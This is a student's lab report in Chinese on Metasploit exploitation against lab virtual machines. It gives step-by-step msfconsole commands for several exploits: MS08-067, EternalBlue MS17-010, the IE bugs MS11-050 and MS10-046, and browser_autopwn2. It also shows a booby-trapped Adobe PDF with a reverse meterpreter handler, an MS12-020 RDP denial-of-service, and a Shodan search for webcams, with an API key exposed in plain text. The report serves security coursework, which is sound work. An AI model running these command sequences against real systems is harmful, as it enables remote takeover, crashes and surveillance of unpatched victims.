目录
一、实验内容说明及基础问题回答
二、实验过程
- 主动攻击实践
- ms08_067
- ms17_010
- 针对浏览器的攻击
- ms11_050
- browser_autopwn
- ms10_046
- 对客户端的攻击
- Adobe
- 辅助模块的使用
- 成功应用auxiliary/dos/windows/rdp/ms12_020_maxchannelids模块(唯)
- 网络摄像头的查找
三、实验总结
一、实验基础问题回答
(1)用自己的话解释什么是 exploit , payload , encode.
- exploit
渗透攻击模块,利用系统服务应用中的漏洞取得权限 - payload
一段代码,用于渗透之后在目标主机上执行 - encode
用来对payload进行编码,主要是为了避免“坏字符”和做到免杀
二、实验过程
1.主动攻击实践
(1)ms08_067
- 攻击机kali——192.168.182.128 靶机:win2000——192.168.1.5
- 在攻击机kali输入msfconsole进入控制台,依次输入以下指令
use exploit/windows/smb/ms08_067_netapi show payloads set payload generic/shell_reverse_tcp //tcp反向回连 set LHOST 192.168.182.128 //攻击机ip set LPORT 5224//攻击端口 set RHOST 192.168.1.5 //靶机ip,特定漏洞端口已经固定 set target 0 //自动选择目标系统类型,匹配度较高 exploit //攻击
- 成功:
- 输入ipconfig/all,获取相关的MAC地址、IP地址、子网掩码、网关地址以及DNS
(2)ms17_010
- 攻击机kali——192.168.182.128 靶机:Microsoft Windows 7——192.168.182.44
- 进入msfconsole,输入以下指令
use exploit/windows/smb/ms17_010_eternalblue //使用漏洞
show payloads //显示可用攻击载荷
set payload generic/shell_reverse_tcp //选择攻击载荷
options //查看配置信息
set LHOST 192.168.182.128 //设置监听地址
set RHOSTS 192.168.182.44 //设置靶机地址
exploit //开始攻击
2.针对浏览器的攻击
(1)ms11_050
- 攻击机:kali 靶机:Microsoft Windows 7
- 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
use windows/browser/ms11_050_mshtml_cobjectelement//使用浏览器ms11_050漏洞 set payload windows/meterpreter/reverse_http //http反向回连 set LHOST 192.168.182.128 //攻击机ip set LPORT 5224 //攻击端口固定 set URIPATH 5224axy //统一资源标识符路径设置 exploit
- 但设置Internet选项后会出现IE浏览器的错误
(2)browser_autopwn
- 攻击机:kali 靶机:win2000
- 换一个漏洞`实施browser_autopwn模块 `
- 攻击机里进入msfconsole,然后分别输入:
use auxiliary/server/browser_autopwn2 set SRVHOST 192.168.182.128 set URIPATH auto show options
- 开始攻击,可以看到msf在不停的尝试不同的payload
- 尝试成功,输出了可被访问的URL:http://192.168.182.128:8080/auto并启动服务器
- 如图:
(3)ms10_046
- 攻击机:kali 靶机:WindowsXP
- 输入以下指令:
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader//使用浏览器ms10_046漏洞 set payload windows/meterpreter/reverse_http //http反向回连 set LHOST 192.168.182.128//攻击机ip set LPORT 5224 //攻击端口固定 exploit
- 在靶机的浏览器上输入:
http://192.168.182.128:80/
- 选择session,建立会话:
3.对客户端的攻击
(1)Adobe
- 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
use windows/fileformat/adobe_cooltype_sing set payload windows/meterpreter/reverse_tcp //tcp反向回连 set LHOST 192.168.182.128 //攻击机ip set LPORT 5224//攻击端口 set FILENAME 20175224.pdf //设置生成pdf文件的名字 exploit //攻击
- 将生成的pdf文件拷贝到靶机上
- 在kali上输入back退出当前模块,进入监听模块,输入以下命令:
use exploit/multi/handler //进入监听模块 set payload windows/meterpreter/reverse_tcp //tcp反向连接 set LHOST 192.168.182.128 //攻击机ip set LPORT 5224 //攻击端口固定 exploit
- 在靶机上打开20175224.pdf文件
- 攻击机显示攻击成功
- 靶机关闭PDF文件则失去权限
4.辅助模块的使用
(1)成功应用auxiliary/dos/windows/rdp/ms12_020_maxchannelids模块
- 攻击:kali 靶机:win2008
- 使用命令show auxiliary查看所有的辅助模块
- 使用MS12-020(CVE-2012-0002)蓝屏攻击
- 进入msfconsole
- 输入以下指令:
search ms12-020 //搜索漏洞 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids //使用漏洞 options //查看配置信息 set RHOST 192.168.182.128 //设置攻击IP exploit //开始攻击
- 攻击成功
(2)网络摄像头的查找
- shodan官网注册账号,登陆查看账户API后设置APIKEY set F9MYLmsRI1qvIGG9LJvjYndut8hFvAB4
gather/shodan_search //查找网络摄像头 use auxiliary/gather/shodan_search //使用辅助模块 show options //查看需要输入的参数
set QUERY "webcamXP"
set RHOSTS 192.168.182.138
run
三、实验总结
(1)离实战还缺些什么技术或步骤?
现在对漏洞的了解还很匮乏,更不要说利用漏洞去攻击了。而且实验都是在防火墙等安全防护都关闭的情况下进行的,对于日常其实实现起来应该比较困难。在利用后门程序之前也应该对其进行检测。
(2)心得体会
本次实验学会了如何搜索漏洞,并在现有的漏洞环境下,尝试利用漏洞进行直接或间接主动攻击客户端。在整个过程中,其实找适合的虚拟机特别关键,整个过程耗费的时间大量集中在尝试不同虚拟机使其得以被攻击。不乏看出,打过补丁的虚拟机其抗攻击能力更强,这也提醒我们应时常更新配置。